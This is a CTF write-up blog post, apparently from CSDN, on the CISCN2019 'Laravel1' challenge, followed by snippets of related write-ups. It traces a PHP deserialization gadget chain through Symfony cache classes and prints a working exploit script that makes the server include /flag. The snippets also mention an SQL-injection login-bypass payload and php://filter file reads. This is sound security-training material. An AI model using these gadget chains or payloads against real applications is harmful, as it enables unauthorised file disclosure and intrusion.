[CISCN2019 总决赛 Day1 Web4]Laravel1

最新推荐文章于 2024-05-11 10:07:25 发布
最新推荐文章于 2024-05-11 10:07:25 发布
阅读量387 收藏 1
点赞数
分类专栏: BUUCTF 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/shinygod/article/details/126759182
版权 
知识点:代码审计

从页面给的代码我们可以看到有网站备份source.tar.gz,且是以get方式传一个序列化的payload。

<?php
//backup in source.tar.gz
namespace App\Http\Controllers;
class IndexController extends Controller
{
    public function index(\Illuminate\Http\Request $request){
        $payload=$request->input("payload");
        if(empty($payload)){
            highlight_file(__FILE__);
        }else{
            @unserialize($payload);
        }
    }
}

解压一下tar -zxvf source.tar.gz,然后就是审计了,没说明头绪就先看一下大佬们的解析,这边我学到两个方便的功能,在phpstorm中Ctrl+Alt+B显示子类继承图,Ctrl+Alt+U显示父类继承图,各类的关系很清晰。
在这里插入图片描述

审计:

序列化的题目可以从__destruct入手,在TagAwareAdapter中,再继续完善链子,且invalidateTags也在本页中。
现在链子为__destruct => commit => invalidateTags
在这里插入图片描述
invalidateTags$this->pool是可控的,那么我们可以找一个有saveDeferred方法的类,但在这之前要先看一下pool怎么赋值。
在这里插入图片描述
可以看到pool是接口AdapterInterface的,所以现在要找一个实现接口AdapterInterface且存在方法saveDeferred的类,且saveDeferred这个方法可以利用。

在这里插入图片描述

PhpArrayAdaptersaveDeferrednull === $this->values默认符合,然后$this->initialize();,继续向下看呗

在这里插入图片描述
但是在利用saveDeferred之前还要实现一个接口CacheItemInterface,选择一个。
在这里插入图片描述
在这里插入图片描述
实现了CacheItemInterface接口后,再看initialize();方法,也是链子的结尾。(在PhpArrayTrait.php中),利用点就是include
在这里插入图片描述

exp

<?php
namespace Symfony\Component\Cache{
    final class CacheItem{}
}

namespace Symfony\Component\Cache\Adapter{
    use Symfony\Component\Cache\CacheItem;
    class TagAwareAdapter{
        private $deferred;
        private $pool;
        public function __construct(){
            $this->deferred  = ["succ3"=>new CacheItem()];
            $this->pool = new PhpArrayAdapter();
        }
    }

    class PhpArrayAdapter{
        private $file = "/flag";
    }
    $a = new TagAwareAdapter();
    echo urlencode(serialize($a));
}

参考:

https://www.xuxblog.top/archives/ciscn2019zong-jue-sai-day1web4laravel1

[CISCN2019 总决赛 Day1 Web4]Laravel1-PHP代码审计学习
cjdgg的博客
03-16 920
题目就是简单的几行代码,看到了反序列化函数,还提示了有源代码,那就说明得审代码找POP链咯 源码下了文件还挺多的,这会就有点懵逼了,文件这么多一个一个的找得找到猴年马月啊。 无奈之下上网翻一翻网上审Laravel的文章,发现了可以先全局搜索缩小范围(Sublimetext中是快捷键ctrl+shift+f),提高速率,我搜了下_destruct 找到了不少,双击就可以去到文件文件里面具体查看,接下来就是一个个去看有没有发现有用的吧 第一次审这么大的文件,东西太多太杂,没啥经验,没看出啥,只能找篇大佬的.
CISCN final 几道web题总结
weixin_30376453的博客
07-30 264
因为都有源码,所以这里直接从源码开始分析: 1.Easy web 这道题本来的意思应该是通过注入来load_file读取config.php来泄露cookie的加密密钥,从而伪造身份进行登陆再上传shell 这里本来addslashes以后就基本没法注入,但是这里却多了两行替换,所以能够继续注入, 这里config过滤可以使用16进制或者char编码绕过: ...
刷题(第二周)
qq_62046696的博客
03-06 840
感悟:代码审计的题的确非常需要耐心一个个看,所以做题应该静下心来,思路:找出可以利用的方法比如,include/file_get_contents等,然后找出__destruct起点一步步观察。这里的this->pool是我们可以控制的,所以找出一个恶意类中的 saveDeferred方法即可,最终找到了PhpArrayAdapter.php中的方法,这里虽然报错了,但还是返回了1/0我们输入的值,因为flask框架是基于python语言的,所以师傅们用的方法是#注释掉后面的,
[VNCTF 2021]Easy_laravel-PHP代码审计&CVE-2021-3129学习记录
cjdgg的博客
04-05 1811
[VNCTF 2021]Easy_laravel-PHP代码审计学习记录 上次做完那道代码审计后,好巧不巧,又有新的php代码审计题,也是Laravel,话不多说,进入正题 这题一进入就是这个页面,看到这个页面就想起了之前拿CVE打过的一个靶机,于是看了下版本号找找有没有CVE可以打 谷歌搜了下laravel 8.22.1 exploit,很绝望,这个版本几乎都是CVE的修复版本,没有可用的CVE,这题还提供了源代码,那就只能慢慢看了 又是熟悉的N多个文件夹,依旧是先全局搜索_destruct找可以用
推荐一款强大的 Laravel 模型审计工具:OwenIt/LaravelAuditing
最新发布
gitblog_00027的博客
05-11 568
推荐一款强大的 Laravel 模型审计工具:OwenIt/LaravelAuditing laravel-auditingRecord the change log from models in Laravel项目地址:https://gitcode.com/gh_mirrors/la/laravel-auditing 在软件开发中,特别是在企业级应用中,记录和理解数据模型的变化是至关重要的。...
Flask 专题
NYG694的博客
03-14 609
但不知道密钥,题目说FLASK,那肯定就是找密钥,发现输入什么都没有显示,只有author那里有回显在版上,所以尝试sstl,{{config}}找到密钥。发现源码,可以在路径上进行sstl,但这题貌似没发执行shell,因为禁了(),但这里把flag放在了config,config还是可以看的。扫目录发现有admin进入admin界面,发现有源码提示,有模型下载还有源码,但发现源码是乱的,但因为有规律,可以用脚本复原,进行拼接。本来还有两题,但不是太难了就是环境不支持。查看session解密。
PHP代码审计18—PHP代码审计小结
W0ngk,一个安全菜鸡,一直在模仿,尚未有超越。
08-25 3581
阶段性小结
我们的决赛
万码千钧
01-23 399
下午对阵研究生院,干掉他们便出线,就可以有更多锻炼队伍的机会,否则……暂且不考虑。 这是我们的决赛。我希望自己的体力争点气,正当或超常发挥,打进珍贵一球。加油!
Laravel开发-laravel-auditing
08-28
Laravel开发-laravel-auditing 审核您在Laravel/Lumen中雄辩模型的更改
[CISCN2019 华北赛区 Day1 Web1]Dropbox
沐目的博客
10-31 6982
知识点轰炸 1.1 open_basedir 在in_set这个函数中,可以设置php的一些配置,其中就包括open_basedir ,用来限制当前程序可以访问的目录。后来问了一下朱师傅,了解到:它是可以访问设置目录下的所有下级目录。 若"open_basedir = /dir/user", 那么目录 “/dir/user” 和 “/dir/other"都是可以访问的。所以如果要将访问限制在仅为指...
CISCN2019 web writeup
stepone4ward的博客
04-25 2141
记录一下萌新的第一次CISCN之旅,这次和队友一起完成了两道web题目(虽然第二题没有什么输出),这次的web题目质量很高,接下来是我对这次比赛解题过程的记录~ web1 访问index.php,可以看到如下界面 右键查看页面源代码 得到了两个提示 1.index.php中可能存在有文件包含的漏洞 2.hint.php存在有提示 首先利用php://filter访问hint.php,修改url...
BUUCTF WEB(2020-4月刷题~)
A_dmin的博客
05-04 1169
[CISCN2019 总决赛 Day2 Web1]Easyweb [安洵杯 2019]easy_serialize_php [GXYCTF2019]BabyUpload [BJDCTF2020]EasySearch [V&N2020 公开赛]HappyCTFd [V&N2020 公开赛]CHECKIN
BUUCTF web writeup
热门推荐
stepone4ward的博客
09-11 5万+
buuctf题目的部分writeup,持续更新中
BUUCTF-WEB-[CISCN2019 华北赛区 Day1 Web2]ikun
weixin_43345082的博客
07-30 8692
当时没做出来,大佬复现了环境就做一波 题目 第一步提示我们要找到lv6 写个脚本找一下 import requests url="http://web44.buuoj.cn/shop?page=" for i in range(0,2000): r=requests.get(url+str(i)) if 'lv6.png' in r.text: print (i) break ...
BUU__Web 分类练习文档
风过江南乱的博客
08-18 1110
前言 这是赵总总结分类的,我只是搬一下,保存一下,原链接 赵总博客 分类 1、代码审计以及反序列化 https://buuoj.cn/challenges#BUU%20CODE%20REVIEW%201 https://buuoj.cn/challenges#[HCTF%202018]WarmUp https://buuoj.cn/challenges#[%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98%202019]PHP https://buuoj.cn/
[CISCN2019 总决赛 Day2 Web1]Easyweb 1
weixin_43940853的博客
03-17 1417
文件泄露 通过观察源代码(反正就是这几个php文件嘛,一个个试就行了) //image.php.bak <?php include "config.php"; $id=isset($_GET["id"])?$_GET["id"]:"1"; $path=isset($_GET["path"])?$_GET["path"]:""; $id=addslashes($id); $path=a...
BUU CTF web(四)
0xdawn的博客
05-11 6323
[HarekazeCTF2019]encode_and_encode <?php error_reporting(0); if (isset($_GET['source'])) { show_source(__FILE__); exit(); } function is_valid($str) { $banword = [ // no path traversal '\.\.', // no stream wrapper '(php|file|glob
[ciscn2019 总决赛 day2 web1]easyweb
03-16
很高兴为您提供答案。 ciscn2019 总决赛 day2 web1 easyweb 是一道Web安全题目,需要使用SQL注入技术来解决。 首先,我们需要在登录页面中输入用户名和密码。然后,我们可以通过在用户名和密码字段中输入一些SQL注入语句来尝试绕过验证。 例如,我们可以在用户名字段中输入: admin' or 1=1# 这将导致SQL查询返回所有用户的信息,因为1=1始终为真。 然后,我们可以在密码字段中输入任何值,因为它不会被使用。 这样,我们就可以成功登录并获得flag。 希望这可以帮助您解决这道题目。如果您有任何其他问题,请随时问我。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值